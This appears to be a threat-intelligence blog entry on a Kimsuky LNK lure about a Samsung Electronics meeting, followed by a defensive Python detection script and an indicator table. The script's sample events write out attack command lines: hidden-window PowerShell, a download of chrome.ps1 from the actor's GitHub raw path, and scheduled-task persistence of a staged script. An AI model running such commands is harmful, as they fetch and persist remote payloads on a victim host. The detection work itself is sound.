Kimsuky malware built around a Samsung Electronics meeting lure (2025.9.11)

2025-09-17 Sakai Malware Created by Kimsuky Related to a Samsung Electronics Meeting (2025.9.11)

https://wezard4u.tistory.com/429599


A Kimsuky-attributed LNK file masquerades as a PDF related to a Samsung Electronics meeting; when opened it launches PowerShell with a hidden window, which decodes and runs a temporary script. The infection chain downloads a decoy PDF and further scripts from raw.githubusercontent.com under the entire73/leedohun path, stages payloads such as chrome.ps1, temp.ps1, and system_first.ps1 under temporary or AppData locations, and registers a scheduled task for persistence. The lure content references Samsung Global Public Affairs meeting topics around U.S.-China relations, Indo-Pacific strategy, tariffs, and Korean security cooperation, which points to policy and external-affairs targets. The combination of GitHub raw content as a delivery channel, a hard-coded GitHub token in the script, hidden-window PowerShell execution, and a recurring scheduled task gives defenders concrete behavioral and infrastructure indicators to hunt for.
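The hunt suggested by the chain above, written as an added example rather than anything from the original post: each rule keys on one behaviour the summary names (hidden-window PowerShell spawned by Explorer, a raw.githubusercontent.com fetch, a GitHub token on the command line, and a scheduled task whose action is a .ps1 under Temp or AppData), and the chain is reported only when every stage is seen. The Sysmon-style events, the placeholder token, and the task name are constructed for the example; the `ghp_` token format is an assumption, since the post says only that a GitHub token is hard-coded.

```python
"""Behavioural hunt for the LNK -> hidden PowerShell -> GitHub raw -> schtasks chain.

Added example, not the blog's code. Events are Sysmon-style process-creation
records (image, parent image, command line); the samples below are constructed.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    cmdline: str        # full command line as logged


# Stage 1: PowerShell with a hidden window, launched from Explorer (how a
# double-clicked LNK runs). Matches -w, -win and -WindowStyle forms.
HIDDEN_PS = re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I)
# Stage 2: payload or decoy fetched from GitHub raw content
RAW_GH = re.compile(r"raw\.githubusercontent\.com/\S+", re.I)
# Stage 3: classic GitHub PAT shape ('ghp_' + 36 chars). Assumption: the post
# only says a GitHub token is hard-coded; it does not give the token format.
GH_TOKEN = re.compile(r"\bghp_[A-Za-z0-9]{36}\b")
# Stage 4: schtasks /create whose action runs a .ps1 staged under Temp/AppData
STAGED_PS1 = re.compile(r"(?:\\Temp\\|\\AppData\\)\S*\.ps1", re.I)

CHAIN = (
    "hidden_powershell_from_explorer",
    "raw_github_download",
    "github_token_in_cmdline",
    "schtask_runs_staged_ps1",
)


def is_powershell(path: str) -> bool:
    return path.lower().endswith(("powershell.exe", "pwsh.exe"))


def classify(ev: ProcEvent) -> list[str]:
    """Return the chain stages a single event matches (may be several or none)."""
    hits = []
    if (is_powershell(ev.image)
            and ev.parent_image.lower().endswith("explorer.exe")
            and HIDDEN_PS.search(ev.cmdline)):
        hits.append("hidden_powershell_from_explorer")
    if RAW_GH.search(ev.cmdline):
        hits.append("raw_github_download")
    if GH_TOKEN.search(ev.cmdline):
        hits.append("github_token_in_cmdline")
    if (ev.image.lower().endswith("schtasks.exe")
            and re.search(r"/create", ev.cmdline, re.I)
            and STAGED_PS1.search(ev.cmdline)):
        hits.append("schtask_runs_staged_ps1")
    return hits


def hunt(events: list[ProcEvent]) -> dict[str, list[ProcEvent]]:
    """Group matching events by chain stage."""
    findings: dict[str, list[ProcEvent]] = {}
    for ev in events:
        for stage in classify(ev):
            findings.setdefault(stage, []).append(ev)
    return findings


def chain_complete(findings: dict[str, list[ProcEvent]]) -> bool:
    """True only when every stage of the described chain was observed."""
    return all(stage in findings for stage in CHAIN)


# Constructed placeholder token; shape only, not a real credential.
FAKE_TOKEN = "ghp_" + "A" * 36

# Constructed sample telemetry exercising each stage plus one benign launch.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              r"powershell.exe -WindowStyle Hidden -ep Bypass -enc SQBFAFgAIAAk"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -w hidden -c iwr "
              r"'https://raw.githubusercontent.com/entire73/leedohun/main/chrome.ps1' "
              r"-Headers @{Authorization='token " + FAKE_TOKEN + r"'} "
              r"-OutFile $env:TEMP\chrome.ps1"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'schtasks.exe /create /sc minute /mo 10 /tn "SampleTask" '
              r'/tr "powershell.exe -w hidden -f C:\Users\u\AppData\Roaming\system_first.ps1" /f'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              r"powershell.exe -NoProfile -Command Get-Date"),  # benign, no hit
]

if __name__ == "__main__":
    found = hunt(SAMPLE_EVENTS)
    for stage, evs in found.items():
        print(f"{stage}: {len(evs)} event(s)")
    print("full chain observed:", chain_complete(found))
```

In production the same rules would run over Sysmon Event ID 1 or Security 4688 records with command-line auditing enabled; the value of `chain_complete` is that any single stage (a hidden PowerShell window, a GitHub raw download) is common enough to be noisy on its own, while all four together on one host in a short window is a strong match for the chain the post describes.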

Indicators of Compromise

Type     Value                               First Seen   Last Seen
HASH     e0d6de68f6bad27f668a6da26a6a8cb…    2025-09-17   2025-09-17
HASH     21a20215102f44ee2f47c21791ec5e6…    2025-09-17   2025-09-17
HASH     f2d65a516a9f68487f1fb417f0f20314    2025-09-17   2025-09-17
DOMAIN   sercontent.com                      2025-09-17   2025-09-17
IPv4     45.32.133.19                        2025-09-08   2025-09-17
